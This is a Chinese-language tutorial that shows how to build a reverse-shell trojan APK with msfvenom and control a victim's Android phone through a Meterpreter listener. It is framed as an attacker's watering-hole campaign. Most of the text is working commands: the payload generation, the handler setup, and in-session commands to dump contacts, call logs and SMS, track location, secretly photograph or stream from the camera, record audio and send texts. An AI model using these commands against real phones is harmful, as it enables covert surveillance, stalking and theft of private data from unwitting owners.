基于Meterpreter安卓手机监控

基于Meterpreter安卓手机监控

概述

在前面的文章中已经对Meterpreter的详细介绍,这里不再重复赘述(传送门)。本文着重介绍在Metasploi框架下中基于Meterpreter对安卓手机的持续性监控。

背景

攻击者通过水坑攻击的方式往受害者的安卓手机中植入了木马程序,通过木马程序对其进行持续性监控,从而获取有价值的信息。

实验环境

攻击者:kali linux (192.168.31.248)

受害者:EMUI系统3.1

实战

  1. 使用msfvenom生成木马文件;

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.248 LPORT=4444 R > /var/www/html/pentest.apk

 

  1. 将木马植入受害者手机后,在metasploit中使用meterpreter攻击载荷进行反向监听,等待受害者点击木马程序并返回meterpreter会话;

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.31.248

set lport 4444

exploit

  1. 当接收到meterpreter会话后,就可以对目标安卓手机进行相应的操作了。以下放一张网图做一下简单的解释;

  1. 接下来是对常用功能进行简单的实践;跟基于meterpreter对Windows系统进行控制一样,有些功能和命令都是通用的。如sysinfo,webcam_list等;

Wakelock    #激活或关闭wakelock功能。顺便简单介绍下wakelock,该功能主要作用是控制手机在息屏情况下是否继续运转程序。详细情况可自行百度。

check_root    #检查是否为root模式

check_root    #检查是否root

dump_calllog   #获取通讯录

dump_contacts    #获取通话记录

dump_sms    #获取短信记录

geolcate    #获取地理位置

run get_local_subnets  #获取网段与掩码

  1. 在获取相关信息后,即可进行相应的监控操作;

webcam_list   #查看摄像头列表

webcam_stream    #调用摄像头

webcam_chat     #视频通话

webcam_snap     #偷拍

record_mic  #录取一段音频

send_sms -d +8610086 -t “测试短信”    #发送短信

结束语

以上仅为实验步骤。但在实际渗透过程中,远没有这么简单。不仅需要考虑如何将木马植入受害者的设备,还要考虑木马免杀、木马寄生等问题。在后续的文章中也会将这些问题逐一进行介绍。